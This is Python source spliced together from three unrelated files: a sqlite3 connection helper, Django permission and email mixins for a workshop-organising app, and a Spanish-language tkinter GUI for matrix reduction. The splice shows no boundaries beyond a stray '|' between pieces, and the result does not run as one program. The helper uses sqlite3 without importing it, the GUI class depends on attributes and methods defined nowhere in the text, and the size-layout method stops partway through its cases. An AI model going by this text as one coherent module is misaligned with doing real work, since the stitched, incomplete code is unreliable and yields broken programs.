CONN_STRING = '/media/sf_VBox_Shared/CaseLaw/caselaw.db'
def get_connection(db_path=None):
    """Open and return a sqlite3 connection.

    Args:
        db_path: optional database path; defaults to CONN_STRING, so
            existing callers of get_connection() behave exactly as before.
            The parameter makes the helper reusable (and testable with
            ':memory:').
    """
    if db_path is None:
        db_path = CONN_STRING
    return sqlite3.connect(db_path)
from django.contrib import messages
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.http import Http404
from django.http import HttpResponseForbidden
from django.http import HttpResponseRedirect, JsonResponse
from wye.base.constants import WorkshopStatus, FeedbackType
from wye.base.emailer import send_mail
from wye.organisations.models import Organisation
from wye.profiles.models import Profile
from wye.regions.models import RegionalLead
from .models import Workshop, WorkshopFeedBack
class WorkshopAccessMixin(object):
    """Allow the view only to admins, regional leads of the workshop's
    location, or organisers belonging to the requesting organisation."""

    def dispatch(self, request, *args, **kwargs):
        user = request.user
        pk = self.kwargs.get(self.pk_url_kwarg, None)
        # NOTE(review): raises Workshop.DoesNotExist (a 500) for an unknown
        # pk; consider get_object_or_404 here.
        workshop = Workshop.objects.get(id=pk)
        is_admin = Profile.is_admin(user)
        is_lead = (Profile.is_regional_lead(user) and
                   RegionalLead.is_regional_lead(user, workshop.location))
        is_organiser = (Profile.is_organiser(user) and
                        user in workshop.requester.user.all())
        if not (is_admin or is_lead or is_organiser):
            # typo fixed in the user-facing message ("sufficent")
            return HttpResponseForbidden("Not sufficient permission")
        return super(WorkshopAccessMixin, self).dispatch(request, *args, **kwargs)
class WorkshopFeedBackMixin(object):
    """
    Restrict access to feedback url if
    - Workshop is not completed
    - If the user accessing the url is not presenter or
    organiser
    """
    def dispatch(self, request, *args, **kwargs):
        pk = self.kwargs.get('pk')
        # NOTE(review): raises Workshop.DoesNotExist (a 500) for an unknown
        # pk; consider get_object_or_404 here.
        workshop = Workshop.objects.get(id=pk)
        user = self.request.user
        # feedback only makes sense once the workshop has taken place
        if workshop.status != WorkshopStatus.COMPLETED:
            raise Http404
        if not (workshop.is_presenter(user) or workshop.is_organiser(user)):
            raise PermissionDenied
        return super(WorkshopFeedBackMixin, self).dispatch(request, *args, **kwargs)
class WorkshopRestrictMixin(object):
    """
    Mixin to restrict
    - For organisation to add workshop if no feedback is shared.
    - For presenter to takeup workshop if no feedback is shared
    """
    # set True on views where presenters may act; the pending-feedback
    # check then applies to them as well
    allow_presenter = False

    def dispatch(self, request, *args, **kwargs):
        self.user = request.user
        self.feedback_required = []  # workshops still awaiting feedback
        # check if user is tutor
        if Profile.is_presenter(self.user) and self.allow_presenter:
            self.validate_presenter_feedback()
        elif (Profile.is_organiser(self.user) and
                Organisation.list_user_organisations(self.user).exists()):
            # if user is from organisation
            self.validate_organisation_feedback()
        elif (Profile.is_regional_lead(self.user) or
                Profile.is_admin(self.user)):
            pass  # don't restrict lead and admin
        else:
            raise PermissionDenied
        if self.feedback_required:
            return self.return_response(request)
        return super(WorkshopRestrictMixin, self).dispatch(request, *args, **kwargs)

    def validate_presenter_feedback(self):
        """Collect completed workshops this presenter has not reviewed yet."""
        workshops = Workshop.objects.filter(
            presenter=self.user, status=WorkshopStatus.COMPLETED)
        for workshop in workshops:
            feedback = WorkshopFeedBack.objects.filter(
                workshop=workshop, feedback_type=FeedbackType.PRESENTER
            ).count()
            if feedback == 0:
                self.feedback_required.append(workshop)

    def validate_organisation_feedback(self):
        """Collect completed workshops the user's organisation has not
        reviewed yet."""
        workshops = Workshop.objects.filter(
            requester__user=self.user, status=WorkshopStatus.COMPLETED)
        for workshop in workshops:
            feedback = WorkshopFeedBack.objects.filter(
                workshop=workshop, feedback_type=FeedbackType.ORGANISATION
            ).count()
            if feedback == 0:
                self.feedback_required.append(workshop)

    def return_response(self, request):
        """Reject the request, naming the workshops that lack feedback."""
        # typo fixed in the user-facing message ("feeback")
        msg = "Please complete the feedback for %s" % (
            ", ".join(map(str, self.feedback_required)))
        # return json for ajax request
        if request.is_ajax():
            return JsonResponse({"status": False, "msg": msg})
        messages.error(request, msg)
        return HttpResponseRedirect(reverse('workshops:workshop_list'))
class WorkshopEmailMixin(object):
    # Email helpers shared by workshop views; expects `self.email_dir`
    # (template directory) and, for group mail, `self.object` (a Workshop).
    def send_mail_to_presenter(self, user, context):
        """
        Send email to presenter.
        @param user: Is user object
        @param context: Is dict of data required by email template.
        """
        # Send email to presenter
        return send_mail([user.email], context, self.email_dir)

    def send_mail_to_group(self, context, exclude_emails=None):
        """
        Send email to org/group users.
        @param context: Is dict of data required by email template.
        @exclude_emails: Is list of email to be excluded from
        email update.
        """
        if exclude_emails is None:
            exclude_emails = []
        # Collage POC and admin email
        # NOTE(review): 'Collage POC' looks like a typo for 'College POC',
        # but it is a stored user_type value — do not change it here alone.
        poc_admin_user = Profile.get_user_with_type(
            user_type=['Collage POC', 'admin']
        ).values_list('email', flat=True)
        # Org user email
        org_user_emails = self.object.requester.user.filter(
            is_active=True
        ).values_list('email', flat=True)
        # all presenter if any
        all_presenter_email = self.object.presenter.values_list(
            'email', flat=True
        )
        # List of tutor who have shown interest in that location
        region_interested_member = Profile.objects.filter(
            interested_locations=self.object.requester.location,
            usertype__slug='tutor'
        ).values_list('user__email', flat=True)
        all_email = []
        all_email.extend(org_user_emails)
        all_email.extend(all_presenter_email)
        all_email.extend(poc_admin_user)
        all_email.extend(region_interested_member)
        # de-duplicate, then drop the explicitly excluded addresses
        all_email = set(all_email)
        all_email = list(all_email.difference(exclude_emails))
        send_mail(all_email, context, self.email_dir)
|
"""
Este modulo contiene el codigo para la construccion de la GUI
"""
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
import numpy as np
import sympy as sy
class GUI():
    """Tkinter GUI for reducing matrices and solving linear systems.

    The user chooses a size (2-5 rows/columns) and whether to work on a
    plain matrix or on a system of equations; the reduction steps are shown
    in a scrollable pop-up window.

    NOTE(review): this class references several attributes it never creates
    (self.Window, self.VarMatriz, self.NFilas, self.NColumnas, the A11..A57
    entry variables) and a method self.Reducir that is not defined here —
    presumably a subclass or external setup code provides them before
    Interfaz() is called; confirm.
    """

    def __init__(self):
        # Intentionally empty — see the class-level review note about
        # externally provided attributes.
        pass

    def Interfaz(self):
        # Build the graphical user interface
        self.Window.title("App Matrices")
        self.Window.geometry("400x325+100+100")
        self.Window.resizable(0,0)
        self.Window.config(bg='#d4dce3')
        BarraMenu=Menu(self.Window) # Menu for the user to choose between matrix mode and system-of-equations mode
        self.Window.config(menu=BarraMenu)
        self.Archivo=Menu(BarraMenu,tearoff=0)
        self.Archivo.add_radiobutton(label="Matriz ",variable=self.VarMatriz,value=1,command=self.InterfazMatriz)
        self.Archivo.add_radiobutton(label="Sistema de ecuaciones ",variable=self.VarMatriz,value=2,command=self.InterfazMatriz)
        Ayuda=Menu(BarraMenu,tearoff=0)
        Ayuda.add_command(label="Ver la ayuda ",command=self.TopAyuda)
        BarraMenu.add_cascade(label='Archivo', menu=self.Archivo)
        BarraMenu.add_cascade(label='Ayuda', menu=Ayuda)
        self.Texto1=Label(self.Window,bg='#d4dce3',font=(10))
        self.Texto2=Label(self.Window,bg='#d4dce3',font=(10))
        # Size selectors: rows and columns, each limited to 2-5
        ttk.Combobox(self.Window,values=['2','3','4','5'],textvariable=self.NFilas,width=1,state='readonly',font=(10)).place(x=115,y=15)
        ttk.Combobox(self.Window,values=['2','3','4','5'],textvariable=self.NColumnas,width=1,state='readonly',font=(10)).place(x=270,y=15)
        self.NFilas.set("2")
        self.NColumnas.set("2")
        Button(self.Window,text="Generar Cuadro",font=(10),bg='#5c8cc5',fg='white',bd=0,width=39,command=self.MoS).place(x=20,y=50)
        self.FrameMatriz=Frame(self.Window,bg='#d4dce3')
        self.FrameVariables=Frame(self.Window,bg='#d4dce3')
        # Default 2x2 grid of entry boxes
        ttk.Entry(self.FrameMatriz,textvariable=self.A11,width=5,justify='right',font=(10)).grid(row=1,column=1)
        ttk.Entry(self.FrameMatriz,textvariable=self.A12,width=5,justify='right',font=(10)).grid(row=1,column=2)
        ttk.Entry(self.FrameMatriz,textvariable=self.A21,width=5,justify='right',font=(10)).grid(row=2,column=1)
        ttk.Entry(self.FrameMatriz,textvariable=self.A22,width=5,justify='right',font=(10)).grid(row=2,column=2)
        # Action buttons; 'T'/'R'/'G' select the reduction type in Reducir
        self.MTS=ttk.Button(self.Window,text="Matriz Escalonada",width=58,command=lambda: self.Reducir('T'))
        self.MER=ttk.Button(self.Window,text="Matriz Escalonada Reducida",width=58,command=lambda: self.Reducir('R'))
        self.SGJ=ttk.Button(self.Window,text="Solucion por el Metodo de Gauss-Jordan",width=58,command=lambda: self.Reducir('G'))
        self.Archivo.invoke(index=0) # Start with the matrix interface
        Label(self.Window,text='By: Freddy',bg='#d4dce3').place(x=317,y=300)

    def TopAyuda(self):
        """Show the small help pop-up with the contact address."""
        Top=Toplevel()
        texto="\n\tCualquier consulta sobre el proyecto:\t\t\n\ngmail: 160892@unsaac.edu.pe\n"
        Label(Top,text=texto).pack()

    def InterfazMatriz(self):
        """Switch the layout between matrix mode (VarMatriz==1) and system mode."""
        self.NFilas.set('2') # Start the interface with two rows
        self.NColumnas.set('2')# and two columns
        if self.VarMatriz.get()==1:
            self.FrameMatriz.place(x=20,y=90)
            self.Texto1.config(text='Filas:')
            self.Texto1.place(x=70,y=15)
            self.Texto2.config(text='Columnas:')
            self.Texto2.place(x=190,y=15)
            # Move widgets that belong to system mode off-screen (x=1000)
            self.FrameVariables.place(x=1000,y=90)
            self.MTS.place(x=20,y=230)
            self.MER.place(x=20,y=254)
            self.SGJ.place(x=1000,y=254)
            self.MxN()
            self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
            self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
        else:
            # System-of-equations mode: hide matrix-only buttons off-screen
            self.MTS.place(x=1000,y=230)
            self.MER.place(x=1000,y=254)
            self.SGJ.place(x=20,y=254)
            #Frame(self.Window,bg='#d4dce3',width=360,height=49).place(x=20,y=230)
            self.FrameVariables.place(x=20,y=90)
            self.FrameMatriz.place(x=20,y=115)
            self.NFilas.set('2')
            self.NColumnas.set('2')
            self.Texto1.config(text='Ecuaciones:')
            self.Texto1.place(x=20,y=15)
            self.Texto2.config(text='Variables:')
            self.Texto2.place(x=190,y=15)
            self.Sistema()
        self.IniciarCeros()

    def TopMostrar(self):
        # Size and properties of the pop-up window used to display the matrix solution
        self.Top=Toplevel()
        self.Top.title("Resultados")
        self.Top.geometry('500x400+520+100')
        self.Top.resizable(0,0)
        self.Top.focus_set()
        self.canvas=Canvas(self.Top)# Canvas used to scroll in all four directions across the pop-up window
        self.canvas.pack()
        self.BloqueMostrar=Frame(self.canvas)
        self.BloqueMostrar.bind("<Configure>",self.Scroll)# event used to drive the scroll across the pop-up window
        self.BloqueMostrar.pack()
        myscrollbar=Scrollbar(self.Top,orient="vertical",command=self.canvas.yview)# vertical scrollbar
        self.canvas.configure(yscrollcommand=myscrollbar.set)
        # NOTE(review): 'heigh' relies on Tk's option-name abbreviation to
        # mean 'height' — should be spelled out; confirm it works on the
        # deployed Tk version.
        myscrollbar.place(x=480,y=0,heigh=380)
        myscrollbar=Scrollbar(self.Top,orient="horizontal",command=self.canvas.xview)# horizontal scrollbar
        self.canvas.configure(xscrollcommand=myscrollbar.set)
        myscrollbar.place(x=0,y=380,width=480)
        self.canvas.create_window((0,0),window=self.BloqueMostrar,anchor='nw')
        Label(self.BloqueMostrar,text=' ',width=20).pack()
        Label(self.BloqueMostrar,text='Matriz inicial',font=(10)).pack()

    def Sistema(self):
        """Lay out the system-of-equations view for the selected size.

        Each (rows, columns) pair gets its own branch that places the "="
        labels, shows the right-hand-side entry column (C*) and hides the
        unused boxes (L*).
        """
        self.MxN()
        # Column headers X1..Xn for the variables
        for n in range(0,int(self.NColumnas.get())):
            Label(self.FrameVariables,text='X{}'.format(n+1),font=(10),bg='#d4dce3',width=5).grid(row=0,column=n+1)
        if self.NFilas.get()=='2' and self.NColumnas.get()=='2':
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=3)
            self.C14(),self.C24(),self.L03(),self.L04(),self.L05()
            self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
            self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
        elif self.NFilas.get()=='2' and self.NColumnas.get()=='3':
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=4)
            self.C15(),self.C25(),self.L04(),self.L05()
            self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
            self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
        elif self.NFilas.get()=='2' and self.NColumnas.get()=='4':
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=5)
            # NOTE(review): unlike the (2,2)/(2,3) cases this branch hides
            # L05 but not L04 — verify this asymmetry is intended.
            self.C16(),self.C26(),self.L36(),self.L46(),self.L05()
            self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
        elif self.NFilas.get()=='2' and self.NColumnas.get()=='5':
            self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=6)
            self.C17(),self.C27(),self.L37(),self.L47(),self.L57()
        elif self.NFilas.get()=='3' and self.NColumnas.get()=='2':
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=3)
            self.C14(),self.C24(),self.C34(),self.L03(),self.L04(),self.L05()
            self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
            self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
        elif self.NFilas.get()=='3' and self.NColumnas.get()=='3':
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=4)
            self.C15(),self.C25(),self.C35(),self.L04(),self.L05()
            self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
            self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
        elif self.NFilas.get()=='3' and self.NColumnas.get()=='4':
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=5)
            self.C16(),self.C26(),self.C36(),self.L46(),self.L05()
            self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
        elif self.NFilas.get()=='3' and self.NColumnas.get()=='5':
            self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=6)
            self.C17(),self.C27(),self.C37(),self.L47(),self.L57()
        elif self.NFilas.get()=='4' and self.NColumnas.get()=='2':
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=3)
            self.C14(),self.C24(),self.C34(),self.C44(),self.L03(),self.L04(),self.L05()
            self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
            self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
        elif self.NFilas.get()=='4' and self.NColumnas.get()=='3':
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=4)
            self.C15(),self.C25(),self.C35(),self.C45(),self.L04(),self.L05()
            self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
            self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
        elif self.NFilas.get()=='4' and self.NColumnas.get()=='4':
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=5)
            self.C16(),self.C26(),self.C36(),self.C46(),self.L56(),self.L05()
            self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
        elif self.NFilas.get()=='4' and self.NColumnas.get()=='5':
            self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=6)
            self.C17(),self.C27(),self.C37(),self.C47(),self.L57()
        elif self.NFilas.get()=='5' and self.NColumnas.get()=='2':
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=3)
            self.C14(),self.C24(),self.C34(),self.C44(),self.C54(),self.L03(),self.L04(),self.L05()
            self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
            self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
        elif self.NFilas.get()=='5' and self.NColumnas.get()=='3':
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=4)
            self.C15(),self.C25(),self.C35(),self.C45(),self.C55(),self.L04(),self.L05()
            self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
            self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
        elif self.NFilas.get()=='5' and self.NColumnas.get()=='4':
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=5)
            self.C16(),self.C26(),self.C36(),self.C46(),self.C56(),self.L05()
            self.L17(),self.L27(),self.L37(),self.L47(),self.L57()
        elif self.NFilas.get()=='5' and self.NColumnas.get()=='5':
            self.L16(),self.L26(),self.L36(),self.L46(),self.L56()
            for i in range(0,int(self.NFilas.get())):
                Label(self.FrameMatriz,text="=",bg='#d4dce3',font=(10)).grid(row=i+1,column=6)
            self.C17(),self.C27(),self.C37(),self.C47(),self.C57()

    def MoS(self): # Rebuild the grid for either a plain matrix or a system of equations
        self.IniciarCeros()
        if self.VarMatriz.get()==1:
            self.MxN()
        else:
            self.Sistema()

    def MostrarMatriz(self,matriz,m,n,tipo): # Shows one step of the matrix solution in the pop-up window
        # Draw the bracket decorations (black Frame strips) around the matrix
        Bloque=Frame(self.BloqueMostrar)
        Bloque.pack()
        Frame(Bloque,bg='black',height=2).grid(row=0,column=1,sticky='we')
        Frame(Bloque,bg='black',height=2,width=10).grid(row=n+1,column=1,sticky='we')
        Frame(Bloque,bg='black',height=2).grid(row=0,column=0,sticky='we')
        Frame(Bloque,bg='black',height=2).grid(row=n+1,column=0,sticky='we')
        for i in range(0,n):
            Frame(Bloque,bg='black',width=2).grid(row=i+1,column=0,sticky='ns')
            for j in range(0,m):
                # NOTE(review): any entry whose text contains 'e' or '.' is
                # replaced by 0 before display — presumably to suppress
                # float round-off noise, but this also zeroes legitimate
                # non-integer values; confirm intended.
                if tipo!='G':
                    for e in str(matriz[i,j]):
                        if e=='e' or e=='.':
                            matriz[i,j]=0
                if tipo=='G' and int(j)<m-1:
                    for e in str(matriz[i,j]):
                        if e=='e' or e=='.':
                            matriz[i,j]=0
                    Label(Bloque,text=str(matriz[i,j]),font=(18)).grid(row=i+1,column=j+2,padx=10)
                else:
                    Label(Bloque,text=str(matriz[i,j]),font=(18)).grid(row=i+1,column=j+3,padx=10)
            if tipo=='G':
                # Extra vertical bars separating the augmented column
                Frame(Bloque,bg='black',width=2).grid(row=i+1,column=m+1,sticky='ns')
            Frame(Bloque,bg='black',width=2).grid(row=i+1,column=m+5,sticky='ns')
        Frame(Bloque,bg='black',height=2,width=10).grid(row=0,column=m+4,sticky='we')
        Frame(Bloque,bg='black',height=2).grid(row=n+1,column=m+4,sticky='we')
        Frame(Bloque,bg='black',height=2).grid(row=0,column=m+5,sticky='we')
        Frame(Bloque,bg='black',height=2).grid(row=n+1,column=m+5,sticky='we')
        Label(self.BloqueMostrar,text=' ',width=20).pack()

    def Scroll(self,event):
        """Keep the pop-up canvas scroll region in sync with its content."""
        self.canvas.configure(scrollregion=self.canvas.bbox("all"),width=450,height=350)

    # Creation of the entry boxes for the initial matrix (Crc -> row r, column c)
    def C11(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A11,width=5,justify='right',font=(16)).grid(row=1,column=1)
    def C12(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A12,width=5,justify='right',font=(16)).grid(row=1,column=2)
    def C13(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A13,width=5,justify='right',font=(16)).grid(row=1,column=3)
    def C14(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A14,width=5,justify='right',font=(16)).grid(row=1,column=4)
    def C15(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A15,width=5,justify='right',font=(16)).grid(row=1,column=5)
    def C16(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A16,width=5,justify='right',font=(16)).grid(row=1,column=6)
    def C17(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A17,width=5,justify='right',font=(16)).grid(row=1,column=7)
    def C21(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A21,width=5,justify='right',font=(16)).grid(row=2,column=1)
    def C22(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A22,width=5,justify='right',font=(16)).grid(row=2,column=2)
    def C23(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A23,width=5,justify='right',font=(16)).grid(row=2,column=3)
    def C24(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A24,width=5,justify='right',font=(16)).grid(row=2,column=4)
    def C25(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A25,width=5,justify='right',font=(16)).grid(row=2,column=5)
    def C26(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A26,width=5,justify='right',font=(16)).grid(row=2,column=6)
    def C27(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A27,width=5,justify='right',font=(16)).grid(row=2,column=7)
    def C31(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A31,width=5,justify='right',font=(16)).grid(row=3,column=1)
    def C32(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A32,width=5,justify='right',font=(16)).grid(row=3,column=2)
    def C33(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A33,width=5,justify='right',font=(16)).grid(row=3,column=3)
    def C34(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A34,width=5,justify='right',font=(16)).grid(row=3,column=4)
    def C35(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A35,width=5,justify='right',font=(16)).grid(row=3,column=5)
    def C36(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A36,width=5,justify='right',font=(16)).grid(row=3,column=6)
    def C37(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A37,width=5,justify='right',font=(16)).grid(row=3,column=7)
    def C41(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A41,width=5,justify='right',font=(16)).grid(row=4,column=1)
    def C42(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A42,width=5,justify='right',font=(16)).grid(row=4,column=2)
    def C43(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A43,width=5,justify='right',font=(16)).grid(row=4,column=3)
    def C44(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A44,width=5,justify='right',font=(16)).grid(row=4,column=4)
    def C45(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A45,width=5,justify='right',font=(16)).grid(row=4,column=5)
    def C46(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A46,width=5,justify='right',font=(16)).grid(row=4,column=6)
    def C47(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A47,width=5,justify='right',font=(16)).grid(row=4,column=7)
    def C51(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A51,width=5,justify='right',font=(16)).grid(row=5,column=1)
    def C52(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A52,width=5,justify='right',font=(16)).grid(row=5,column=2)
    def C53(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A53,width=5,justify='right',font=(16)).grid(row=5,column=3)
    def C54(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A54,width=5,justify='right',font=(16)).grid(row=5,column=4)
    def C55(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A55,width=5,justify='right',font=(16)).grid(row=5,column=5)
    def C56(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A56,width=5,justify='right',font=(16)).grid(row=5,column=6)
    def C57(self):
        ttk.Entry(self.FrameMatriz,textvariable=self.A57,width=5,justify='right',font=(16)).grid(row=5,column=7)

    # Hide entry boxes of the initial matrix by covering them with a
    # background-colored Frame (Lrc -> row r, column c; L0c covers the
    # variable-header row)
    def L13(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=1,column=3,sticky='wesn')
    def L14(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=1,column=4,sticky='wesn')
    def L15(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=1,column=5,sticky='wesn')
    def L16(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=1,column=6,sticky='wesn')
    def L17(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=1,column=7,sticky='wesn')
    def L23(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=2,column=3,sticky='wesn')
    def L24(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=2,column=4,sticky='wesn')
    def L25(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=2,column=5,sticky='wesn')
    def L26(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=2,column=6,sticky='wesn')
    def L27(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=2,column=7,sticky='wesn')
    def L31(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=3,column=1,sticky='wesn')
    def L32(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=3,column=2,sticky='wesn')
    def L33(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=3,column=3,sticky='wesn')
    def L34(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=3,column=4,sticky='wesn')
    def L35(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=3,column=5,sticky='wesn')
    def L36(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=3,column=6,sticky='wesn')
    def L37(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=3,column=7,sticky='wesn')
    def L41(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=4,column=1,sticky='wesn')
    def L42(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=4,column=2,sticky='wesn')
    def L43(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=4,column=3,sticky='wesn')
    def L44(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=4,column=4,sticky='wesn')
    def L45(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=4,column=5,sticky='wesn')
    def L46(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=4,column=6,sticky='wesn')
    def L47(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=4,column=7,sticky='wesn')
    def L51(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=5,column=1,sticky='wesn')
    def L52(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=5,column=2,sticky='wesn')
    def L53(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=5,column=3,sticky='wesn')
    def L54(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=5,column=4,sticky='wesn')
    def L55(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=5,column=5,sticky='wesn')
    def L56(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=5,column=6,sticky='wesn')
    def L57(self):
        Frame(self.FrameMatriz,bg='#d4dce3').grid(row=5,column=7,sticky='wesn')
    def L03(self):
        Frame(self.FrameVariables,bg='#d4dce3').grid(row=0,column=3,sticky='wesn')
    def L04(self):
        Frame(self.FrameVariables,bg='#d4dce3').grid(row=0,column=4,sticky='wesn')
    def L05(self):
        Frame(self.FrameVariables,bg='#d4dce3').grid(row=0,column=5,sticky='wesn')

    def MxN(self): # Call the box-creating/box-hiding methods according to the size the user selected
        if self.NFilas.get()=='2' and self.NColumnas.get()=='2':
            self.C11(),self.C12(),self.L13(),self.L14(),self.L15()
            self.C21(),self.C22(),self.L23(),self.L24(),self.L25()
            self.L31(),self.L32(),self.L33(),self.L34(),self.L35()
            self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
            self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
        elif self.NFilas.get()=='2' and self.NColumnas.get()=='3':
            self.C11(),self.C12(),self.C13(),self.L14(),self.L15()
            self.C21(),self.C22(),self.C23(),self.L24(),self.L25()
            self.L31(),self.L32(),self.L33(),self.L34(),self.L35()
            self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
            self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
        elif self.NFilas.get()=='2' and self.NColumnas.get()=='4':
            self.C11(),self.C12(),self.C13(),self.C14(),self.L15()
            self.C21(),self.C22(),self.C23(),self.C24(),self.L25()
            self.L31(),self.L32(),self.L33(),self.L34(),self.L35()
            self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
            self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
        elif self.NFilas.get()=='2' and self.NColumnas.get()=='5':
            self.C11(),self.C12(),self.C13(),self.C14(),self.C15()
            self.C21(),self.C22(),self.C23(),self.C24(),self.C25()
            self.L31(),self.L32(),self.L33(),self.L34(),self.L35()
            self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
            self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
